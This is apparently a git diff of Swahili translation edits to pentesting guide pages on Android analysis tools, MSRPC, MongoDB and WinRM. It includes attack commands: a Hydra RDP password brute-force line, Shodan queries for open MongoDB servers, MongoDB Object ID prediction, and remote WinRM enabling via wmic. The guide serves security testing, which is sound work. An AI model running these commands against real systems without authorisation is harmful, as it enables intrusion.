maarufu ni kipengele cha `WebView` kinachobadilisha URLs kuwa vitu vya `Intent` kupitia `Intent.parseUri(...)` na kisha kuviendesha, ambayo inaweza kusababisha uhamasishaji mbaya wa Intents. ### Essential Takeaways * **Intent Injection** ni sawa na tatizo la Open Redirect la wavuti. -* Uhalifu unahusisha kupitisha vitu vya `Intent` kama ziada, ambavyo vinaweza kuhamasishwa kutekeleza operesheni zisizo salama. +* Uhalifu unahusisha kupitisha vitu vya `Intent` kama ziada, ambavyo vinaweza kuelekezwa kutekeleza operesheni zisizo salama. * Inaweza kufichua vipengele visivyoweza kusambazwa na watoa maudhui kwa washambuliaji. -* Mabadiliko ya URL ya `WebView` kuwa `Intent` yanaweza kuwezesha vitendo visivyokusudiwa. +* Ubadilishaji wa URL wa `WebView` kuwa `Intent` unaweza kuwezesha vitendo visivyokusudiwa. ### Android Client Side Injections and others @@ -565,23 +565,23 @@ Labda unajua kuhusu aina hii ya udhaifu kutoka kwa Wavuti. Lazima uwe makini san * **SQL Injection:** Unaposhughulikia maswali ya dynamic au Watoa-Maudhui hakikisha unatumia maswali yaliyopangwa. * **JavaScript Injection (XSS):** Hakikisha kuwa msaada wa JavaScript na Plugin umezimwa kwa WebViews yoyote (umezimwa kwa default). [Maelezo zaidi hapa](webview-attacks.md#javascript-enabled). * **Local File Inclusion:** WebViews zinapaswa kuwa na ufikiaji wa mfumo wa faili umezimwa (umewezeshwa kwa default) - `(webview.getSettings().setAllowFileAccess(false);)`. [Maelezo zaidi hapa](webview-attacks.md#javascript-enabled). -* **Eternal cookies**: Katika kesi kadhaa wakati programu ya android inamaliza kikao, cookie haifutwi au inaweza hata kuhifadhiwa kwenye diski +* **Eternal cookies**: Katika kesi kadhaa wakati programu ya android inamaliza kikao, cookie haifutwi au inaweza hata kuhifadhiwa kwenye diski. * [**Secure Flag** katika cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags) *** -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! **Hacking Insights**\ -Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking +Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking. **Real-Time Hack News**\ -Endelea kuwa na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi +Endelea kuwa na habari za hivi punde katika ulimwengu wa hacking kupitia habari na maarifa ya wakati halisi. **Latest Announcements**\ -Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa +Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa. **Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! @@ -599,7 +599,7 @@ docker pull opensecurity/mobile-security-framework-mobsf docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest ``` Notice that MobSF can analyse **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\ -Pia, ikiwa unaunda **ZIP** faili na msimbo wa chanzo wa programu ya **Android** au **IOS** (nenda kwenye folda ya mzizi ya programu, chagua kila kitu na uunde faili la ZIP), itakuwa na uwezo wa kuichambua pia. +Pia, ikiwa unaunda **ZIP** file yenye msimbo wa chanzo wa **Android** au **IOS** app (enda kwenye folda ya mzizi ya programu, chagua kila kitu na uunde ZIPfile), itakuwa na uwezo wa kuichambua pia. MobSF also allows you to **diff/Compare** analysis and to integrate **VirusTotal** (you will need to set your API key in _MobSF/settings.py_ and enable it: `VT_ENABLED = TRUE` `VT_API_KEY = ` `VT_UPLOAD = TRUE`). You can also set `VT_UPLOAD` to `False`, then the **hash** will be **upload** instead of the file. @@ -648,32 +648,32 @@ receivers ``` **HTTP tools** -Wakati trafiki ya http inakamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye "**HTTP(S) Traffic**" chini au muonekano mzuri kwenye "**Start HTTPTools**" kitufe kibichi. Kutoka kwenye chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\ +Wakati trafiki ya http inakamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye "**HTTP(S) Traffic**" chini au muonekano mzuri kwenye "**Start HTTPTools**" chini ya kijani. Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\ Ili kufanya hivyo, _washa Burp -->_ _zimisha Intercept --> katika MobSB HTTPTools chagua ombi_ --> bonyeza "**Send to Fuzzer**" --> _chagua anwani ya proxy_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)). Mara tu unapo maliza uchambuzi wa dynamic na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz maombi ya http** na kutafuta udhaifu. {% hint style="info" %} -Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa haijapangwa vizuri na huwezi kuziweka kutoka kwenye GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya: +Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa haijapangwa vizuri na huwezi kuziweka sawa kutoka kwa GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya: ``` adb shell settings put global http_proxy :0 ``` {% endhint %} -### Msaada wa Uchambuzi wa Kijamii na Inspeckage +### Assisted Dynamic Analysis with Inspeckage -Unaweza kupata chombo kutoka [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\ -Chombo hiki kitatumia **Hooks** kukujulisha **kila kinachotokea katika programu** wakati unafanya **uchambuzi wa kijamii**. +You can get the tool from [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\ +This tool with use some **Hooks** to let you know **nini kinaendelea katika programu** while you perform a **dynamic analysis**. ### [Yaazhini](https://www.vegabird.com/yaazhini/) -Hii ni **chombo bora kufanya uchambuzi wa statiki na GUI** +This is a **zana nzuri ya kufanya uchambuzi wa statiki na GUI** ![](<../../.gitbook/assets/image (741).png>) ### [Qark](https://github.com/linkedin/qark) -Chombo hiki kimeundwa kutafuta **udhaifu wa usalama wa programu za Android** kadhaa, iwe katika **kanuni ya chanzo** au **APKs zilizofungashwa**. Chombo hiki pia ni **capable of creating a "Proof-of-Concept" deployable APK** na **ADB commands**, ili kutumia baadhi ya udhaifu uliofindika (Shughuli zilizo wazi, nia, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani. +This tool is designed to look for several **vulnerabilities zinazohusiana na usalama katika programu za Android**, either in **source code** or **packaged APKs**. The tool is also **capable of creating a "Proof-of-Concept" deployable APK** and **ADB commands**, to exploit some of the found vulnerabilities (Exposed activities, intents, tapjacking...). As with Drozer, there is no need to root the test device. ```bash pip3 install --user qark # --user is only needed if not using a virtualenv qark --apk path/to/my.apk @@ -683,17 +683,17 @@ qark --java path/to/specific/java/file.java ### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git) * Inaonyesha faili zote zilizotolewa kwa ajili ya rejeleo rahisi -* Inachambua faili za APK moja kwa moja hadi katika muundo wa Java na Smali +* Inachambua faili za APK kiotomatiki hadi katika muundo wa Java na Smali * Changanua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida * Uchambuzi wa msimbo wa chanzo wa statiki kwa ajili ya udhaifu na tabia za kawaida * Taarifa za kifaa -* na zaidi +* na mengine mengi ```bash reverse-apk relative/path/to/APP.apk ``` ### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super) -SUPER ni programu ya amri ambayo inaweza kutumika katika Windows, MacOS X na Linux, inayochambua _.apk_ faili kutafuta udhaifu. Inafanya hivyo kwa kubonyeza APKs na kutumia mfululizo wa sheria kugundua udhaifu hao. +SUPER ni programu ya amri ambayo inaweza kutumika katika Windows, MacOS X na Linux, inayochambua faili za _.apk_ kutafuta udhaifu. Inafanya hivyo kwa kubonyeza APKs na kutumia mfululizo wa sheria kugundua udhaifu hao. Sheria zote zinazingatia faili ya `rules.json`, na kila kampuni au mtathmini anaweza kuunda sheria zake mwenyewe kuchambua kile wanachohitaji. @@ -735,11 +735,11 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 ![](<../../.gitbook/assets/image (595).png>) -**MARA** ni **M**obile **A**pplication **R**everse engineering na **A**nalysis Framework. Ni chombo kinachokusanya zana zinazotumika mara kwa mara za uhandisi wa nyuma na uchambuzi wa programu za simu, kusaidia katika kupima programu za simu dhidi ya vitisho vya usalama wa simu vya OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa programu za simu na wataalamu wa usalama. +**MARA** ni **M**obile **A**pplication **R**everse engineering na **A**nalysis Framework. Ni chombo kinachokusanya zana zinazotumika mara kwa mara katika uhandisi wa nyuma na uchambuzi wa programu za simu, kusaidia katika kupima programu za simu dhidi ya vitisho vya usalama wa simu vya OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa waendelezaji wa programu za simu na wataalamu wa usalama. Inauwezo wa: -* Kutolewa kwa msimbo wa Java na Smali kwa kutumia zana tofauti +* Kutolewa kwa Java na Smali code kwa kutumia zana tofauti * Kuchambua APKs kwa kutumia: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs\_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD) * Kutolewa kwa taarifa za kibinafsi kutoka kwa APK kwa kutumia regexps. * Kuchambua Manifest. @@ -756,7 +756,7 @@ Kumbuka kwamba kulingana na huduma na usanidi unayotumia kuondoa obfuscation ya ### [ProGuard](https://en.wikipedia.org/wiki/ProGuard\_\(software\)) -Kutoka [Wikipedia](https://en.wikipedia.org/wiki/ProGuard\_\(software\)): **ProGuard** ni chombo cha amri cha chanzo wazi kinachopunguza, kuboresha na kuondoa obfuscation ya msimbo wa Java. Inaweza kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu ya bure na inasambazwa chini ya Leseni ya Umma ya GNU, toleo la 2. +Kutoka [Wikipedia](https://en.wikipedia.org/wiki/ProGuard\_\(software\)): **ProGuard** ni chombo cha amri cha chanzo wazi kinachopunguza, kuboresha na kuondoa obfuscation ya Java code. Ina uwezo wa kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu ya bure na inasambazwa chini ya GNU General Public License, toleo la 2. ProGuard inasambazwa kama sehemu ya Android SDK na inafanya kazi wakati wa kujenga programu katika hali ya kutolewa. @@ -767,16 +767,16 @@ Pata mwongozo wa hatua kwa hatua wa kuondoa obfuscation ya apk katika [https://b (Kutoka kwa mwongozo huo) Mara ya mwisho tulipokagua, hali ya uendeshaji ya Dexguard ilikuwa: * kupakia rasilimali kama InputStream; -* kutoa matokeo kwa darasa linalorithi kutoka FilterInputStream ili kuyafichua; -* kufanya obfuscation isiyo na maana ili kupoteza dakika chache za muda kutoka kwa mhandisi wa nyuma; -* kutoa matokeo yaliyofichuliwa kwa ZipInputStream ili kupata faili ya DEX; +* kutoa matokeo kwa darasa linalorithi kutoka FilterInputStream ili kuyafungua; +* kufanya obfuscation isiyo na maana ili kupoteza dakika chache za wakati kutoka kwa mhandisi wa nyuma; +* kutoa matokeo yaliyofunguliwa kwa ZipInputStream ili kupata faili ya DEX; * hatimaye kupakia DEX inayotokana kama Rasilimali kwa kutumia njia ya `loadDex`. ### [DeGuard](http://apk-deguard.com) **DeGuard inarudisha mchakato wa obfuscation uliofanywa na zana za obfuscation za Android. Hii inaruhusu uchambuzi mwingi wa usalama, ikiwa ni pamoja na ukaguzi wa msimbo na kutabiri maktaba.** -Unaweza kupakia APK iliyofichwa kwenye jukwaa lao. +Unaweza kupakia APK iliyokuwa obfuscated kwenye jukwaa lao. ### [Simplify](https://github.com/CalebFenton/simplify) @@ -788,13 +788,13 @@ APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua waandishi ### Manual -[Somai mwongo huu kujifunza mbinu za **jinsi ya kurudi nyuma obfuscation ya kawaida**](manual-deobfuscation.md) +[Somai hii tutorial ili kujifunza mbinu za **jinsi ya kurudi nyuma obfuscation ya kawaida**](manual-deobfuscation.md) ## Labs ### [Androl4b](https://github.com/sh4hin/Androl4b) -AndroL4b ni mashine ya virtual ya usalama ya Android inayotegemea ubuntu-mate inajumuisha mkusanyiko wa mfumo wa hivi karibuni, mafunzo na maabara kutoka kwa wahandisi wa usalama na watafiti mbalimbali kwa ajili ya uhandisi wa nyuma na uchambuzi wa malware. +AndroL4b ni mashine ya virtual ya usalama wa Android inayotegemea ubuntu-mate inajumuisha mkusanyiko wa mfumo wa hivi karibuni, mafunzo na maabara kutoka kwa wahandisi wa usalama na watafiti mbalimbali kwa ajili ya uhandisi wa nyuma na uchambuzi wa malware. ## References @@ -810,7 +810,7 @@ AndroL4b ni mashine ya virtual ya usalama ya Android inayotegemea ubuntu-mate in * [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/) * [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 853c68a2a..c67d77495 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -34,19 +34,19 @@ Stay informed with the newest bug bounties launching and crucial platform update Protokali ya Microsoft Remote Procedure Call (MSRPC), mfano wa mteja-server unaowezesha programu kuomba huduma kutoka kwa programu iliyoko kwenye kompyuta nyingine bila kuelewa maelezo ya mtandao, ilitokana awali na programu za chanzo wazi na baadaye kuendelezwa na kupewa hakimiliki na Microsoft. -Mchoro wa mwisho wa RPC unaweza kufikiwa kupitia bandari ya TCP na UDP 135, SMB kwenye TCP 139 na 445 (ikiwa na kikao kisichokuwa na thamani au kilichothibitishwa), na kama huduma ya wavuti kwenye bandari ya TCP 593. +Mchoro wa mwisho wa RPC unaweza kufikiwa kupitia bandari ya TCP na UDP 135, SMB kwenye TCP 139 na 445 (ikiwa na kikao kisicho na thamani au kilichothibitishwa), na kama huduma ya wavuti kwenye bandari ya TCP 593. ``` 135/tcp open msrpc Microsoft Windows RPC ``` -## Jinsi MSRPC inavyofanya kazi? +## How does MSRPC work? -Iliyanzishwa na programu ya mteja, mchakato wa MSRPC unahusisha kuita utaratibu wa ndani wa stub ambao kisha unashirikiana na maktaba ya wakati wa mteja kuandaa na kupeleka ombi kwa seva. Hii inajumuisha kubadilisha vigezo kuwa muundo wa kawaida wa Uwakilishi wa Takwimu za Mtandao. Chaguo la itifaki ya usafirishaji linatolewa na maktaba ya wakati wa ikiwa seva iko mbali, kuhakikisha kuwa RPC inapelekwa kupitia safu ya mtandao. +Iliyanzishwa na programu ya mteja, mchakato wa MSRPC unahusisha kuita utaratibu wa ndani wa stub ambao kisha unashirikiana na maktaba ya wakati wa mteja kuandaa na kuwasilisha ombi kwa seva. Hii inajumuisha kubadilisha vigezo kuwa katika muundo wa kawaida wa Uwakilishi wa Takwimu za Mtandao. Chaguo la itifaki ya usafirishaji linatolewa na maktaba ya wakati wa ikiwa seva iko mbali, kuhakikisha kuwa RPC inawasilishwa kupitia safu ya mtandao. ![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png) -## **Kutambua Huduma za RPC Zilizofichuliwa** +## **Identifying Exposed RPC Services** -Ufunuo wa huduma za RPC kupitia TCP, UDP, HTTP, na SMB unaweza kubainishwa kwa kuuliza huduma ya mlocator ya RPC na mwisho mmoja binafsi. Zana kama rpcdump husaidia katika kutambua huduma za RPC za kipekee, zinazoonyeshwa na thamani za **IFID**, zikifunua maelezo ya huduma na vifungo vya mawasiliano: +Ufunuo wa huduma za RPC kupitia TCP, UDP, HTTP, na SMB unaweza kubainishwa kwa kuuliza huduma ya mlocator ya RPC na mwisho mmoja binafsi. Zana kama rpcdump husaidia katika kubaini huduma za RPC za kipekee, zinazoonyeshwa na thamani za **IFID**, zikifunua maelezo ya huduma na vifungo vya mawasiliano: ``` D:\rpctools> rpcdump [-p port] **IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0 @@ -117,7 +117,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805 * [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) * [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index 689d9870c..a20980785 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -32,7 +32,7 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Basic Information -**MongoDB** ni mfumo wa usimamizi wa data **wa chanzo wazi** unaotumia **mfano wa hifadhidata ya hati** kushughulikia aina mbalimbali za data. Inatoa kubadilika na upanuzi kwa usimamizi wa data zisizo na muundo au zenye muundo wa nusu katika programu kama vile uchanganuzi wa data kubwa na usimamizi wa maudhui. **Port ya kawaida:** 27017, 27018 +**MongoDB** ni mfumo wa usimamizi wa data **wa chanzo wazi** unaotumia **mfano wa hifadhidata inayotegemea hati** kushughulikia aina mbalimbali za data. Inatoa kubadilika na upanuzi kwa usimamizi wa data zisizo na muundo au zenye muundo wa kati katika programu kama vile uchanganuzi wa data kubwa na usimamizi wa maudhui. **Port ya kawaida:** 27017, 27018 ``` PORT STATE SERVICE VERSION 27017/tcp open mongodb MongoDB 2.6.9 2.6.9 @@ -68,14 +68,14 @@ nmap -sV --script "mongo* and default" -p 27017 #By default all the nmap mo ``` ### Shodan -* Mongodb yote: `"mongodb server information"` -* Tafuta seva za mongodb zilizo wazi kabisa: `"mongodb server information" -"partially enabled"` -* Tu sehemu ya kuanzisha uthibitisho: `"mongodb server information" "partially enabled"` +* All mongodb: `"mongodb server information"` +* Search for full open mongodb servers: `"mongodb server information" -"partially enabled"` +* Only partially enable auth: `"mongodb server information" "partially enabled"` ## Login Kwa default mongo haitaji nenosiri.\ -**Admin** ni hifadhidata ya kawaida ya mongo. +**Admin** ni database ya kawaida ya mongo. ```bash mongo mongo : @@ -108,7 +108,7 @@ Kwa mfano, hapa kuna jinsi tunavyoweza kuchambua ID halisi ya Object iliyorejesh 3. 2500: Kitambulisho cha Mchakato 4. 314019: Kihesabu kinachoongezeka -Kati ya vipengele vilivyotajwa, kitambulisho cha mashine kitabaki kuwa sawa kwa muda wote ambapo hifadhidata inatumia mashine halisi/virtual ile ile. Kitambulisho cha mchakato kitabadilika tu ikiwa mchakato wa MongoDB utaanzishwa upya. Wakati wa kutokea utaongezwa kila sekunde. Changamoto pekee katika kukisia Object IDs kwa kuongezea tu thamani za kihesabu na wakati, ni ukweli kwamba Mongo DB inazalisha Object IDs na inatoa Object IDs kwa kiwango cha mfumo. +Kati ya vipengele vilivyotajwa, kitambulisho cha mashine kitabaki kuwa sawa kwa muda wote ambapo hifadhidata inatumia mashine halisi/virtual ile ile. Kitambulisho cha mchakato kitabadilika tu ikiwa mchakato wa MongoDB utaanzishwa upya. Wakati wa kutokea utaongezwa kila sekunde. Changamoto pekee katika kukisia Object IDs kwa kuongezea tu thamani za kihesabu na wakati wa kutokea, ni ukweli kwamba Mongo DB inazalisha Object IDs na inatoa Object IDs kwa kiwango cha mfumo. Zana [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict), ikitolewa ID ya kuanzia ya Object (unaweza kuunda akaunti na kupata ID ya kuanzia), inarudisha karibu Object IDs 1000 zinazoweza kuwa zimetolewa kwa vitu vya baadaye, hivyo unahitaji tu kuzitafutia nguvu. @@ -118,7 +118,7 @@ Ikiwa wewe ni root unaweza **kubadilisha** faili ya **mongodb.conf** ili usihita *** -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa! @@ -131,7 +131,7 @@ Endelea kuwa na habari za hivi punde katika ulimwengu wa hacking kupitia habari **Latest Announcements**\ Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa -**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index 73161f40f..abb820a53 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -32,9 +32,9 @@ Stay informed with the newest bug bounties launching and crucial platform update ## WinRM -[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) inasisitizwa kama **protokali na Microsoft** inayowezesha **usimamizi wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inasukumwa na WMI, ikijitokeza kama kiolesura cha HTTP kwa shughuli za WMI. +[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) inasisitizwa kama **protokali na Microsoft** inayowezesha **usimamizi wa mbali wa mifumo ya Windows** kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inasukumwa na WMI, ikijitambulisha kama kiolesura cha HTTP kwa shughuli za WMI. -Uwepo wa WinRM kwenye mashine unaruhusu usimamizi wa mbali kwa urahisi kupitia PowerShell, kama vile SSH inavyofanya kwa mifumo mingine ya uendeshaji. Ili kubaini ikiwa WinRM inafanya kazi, inashauriwa kuangalia ufunguzi wa bandari maalum: +Uwepo wa WinRM kwenye mashine unaruhusu usimamizi wa mbali kwa urahisi kupitia PowerShell, kama vile jinsi SSH inavyofanya kazi kwa mifumo mingine ya uendeshaji. Ili kubaini ikiwa WinRM inafanya kazi, inashauriwa kuangalia ufunguzi wa bandari maalum: * **5985/tcp (HTTP)** * **5986/tcp (HTTPS)** @@ -43,12 +43,12 @@ Bandari iliyo wazi kutoka kwenye orodha hapo juu inaashiria kuwa WinRM imewekwa, ### **Kuanzisha Kikao cha WinRM** -Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft `Enable-PSRemoting` inakuja katika hatua, ikiseti kompyuta kukubali amri za PowerShell za mbali. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutaja mwenyeji yeyote kama wa kuaminika: +Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft `Enable-PSRemoting` inakuja katika picha, ikiseti kompyuta ili kukubali amri za PowerShell za mbali. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutangaza mwenyeji yeyote kama wa kuaminika: ```powershell Enable-PSRemoting -Force Set-Item wsman:\localhost\client\trustedhosts * ``` -Hii mbinu inahusisha kuongeza wildcard kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatia kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" huenda ikawa muhimu kwenye mashine ya mshambuliaji. +Hii mbinu inahusisha kuongeza wildcard kwenye usanidi wa `trustedhosts`, hatua ambayo inahitaji kuzingatia kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" inaweza kuwa muhimu kwenye mashine ya mshambuliaji. Zaidi ya hayo, WinRM inaweza **kuzinduliwa kwa mbali** kwa kutumia amri ya `wmic`, kama inavyoonyeshwa hapa: ```powershell @@ -56,7 +56,7 @@ wmic /node: process call create "powershell enable-psremoting -forc ``` Hii mbinu inaruhusu kuweka WinRM kwa mbali, ikiongeza ufanisi katika kusimamia mashine za Windows kutoka mbali. -### Thibitisha ikiwa imewekwa +### Jaribu ikiwa imewekwa Ili kuthibitisha usanidi wa mashine yako ya shambulio, amri ya `Test-WSMan` inatumika kuangalia ikiwa lengo lina WinRM imewekwa ipasavyo. Kwa kutekeleza amri hii, unapaswa kutarajia kupokea maelezo kuhusu toleo la itifaki na wsmid, ikionyesha usanidi uliofanikiwa. Hapa chini kuna mifano inayoonyesha matokeo yanayotarajiwa kwa lengo lililo na usanidi dhidi ya lile lisilo na usanidi: @@ -68,7 +68,7 @@ Majibu yanapaswa kuwa na habari kuhusu toleo la itifaki na wsmid, ikionyesha kwa ![](<../.gitbook/assets/image (582).png>) -* Kwa upande mwingine, kwa lengo **sio** lililowekwa kwa WinRM, matokeo yatakuwa hakuna habari kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM. +* Kwa upande mwingine, kwa lengo **sio** lililowekwa kwa WinRM, hiyo itasababisha kutokuwepo kwa habari kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM. ![](<../.gitbook/assets/image (458).png>) @@ -80,7 +80,7 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al ``` ![](<../.gitbook/assets/image (151).png>) -Unaweza pia **kutekeleza amri ya console yako ya PS ya sasa kupitia** _**Invoke-Command**_. Fikiria kwamba una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya: +Unaweza pia **kutekeleza amri ya konsoli yako ya PS ya sasa kupitia** _**Invoke-Command**_. Fikiria kwamba una kazi inayoitwa _**enumeration**_ kwenye kompyuta yako na unataka **kuitekeleza kwenye kompyuta ya mbali**, unaweza kufanya: ```powershell Invoke-Command -ComputerName -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] ``` @@ -139,18 +139,18 @@ Ndani ya kikao hiki unaweza kupakia skripti za PS kwa kutumia _Invoke-Command_ ```powershell Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 ``` -### Errors +### Makosa -Ikiwa unapata kosa lifuatalo: +Ikiwa unapata makosa yafuatayo: -`enter-pssession : Kuunganisha na seva ya mbali 10.10.10.175 kumeshindikana na ujumbe wa kosa ufuatao : Mteja wa WinRM haiwezi kushughulikia ombi. Ikiwa mpango wa uthibitishaji ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijajiunga na eneo, basi usafiri wa HTTPS lazima utumike au mashine ya marudio lazima iongezwe kwenye mipangilio ya TrustedHosts. Tumia winrm.cmd kuunda mipangilio ya TrustedHosts. Kumbuka kwamba kompyuta katika orodha ya TrustedHosts zinaweza kutothibitishwa. Unaweza kupata maelezo zaidi kuhusu hilo kwa kuendesha amri ifuatayo: winrm help config. Kwa maelezo zaidi, angalia mada ya msaada ya about_Remote_Troubleshooting.` +`enter-pssession : Kuungana na seva ya mbali 10.10.10.175 kumeshindikana na ujumbe wa makosa ufuatao : Mteja wa WinRM haiwezi kushughulikia ombi. Ikiwa mpango wa uthibitishaji ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijajiunga na eneo, basi usafiri wa HTTPS lazima utumike au mashine ya marudio lazima iongezwe kwenye mipangilio ya TrustedHosts. Tumia winrm.cmd kuunda mipangilio ya TrustedHosts. Kumbuka kwamba kompyuta katika orodha ya TrustedHosts zinaweza kutothibitishwa. Unaweza kupata maelezo zaidi kuhusu hilo kwa kuendesha amri ifuatayo: winrm help config. Kwa maelezo zaidi, angalia mada ya msaada ya about_Remote_Troubleshooting.` Jaribu kwenye mteja (habari kutoka [hapa](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)): ```ruby winrm quickconfig winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ``` -
+
Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! @@ -304,18 +304,18 @@ Name: Hydra Brute Force Description: Need User Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP} ``` -
+
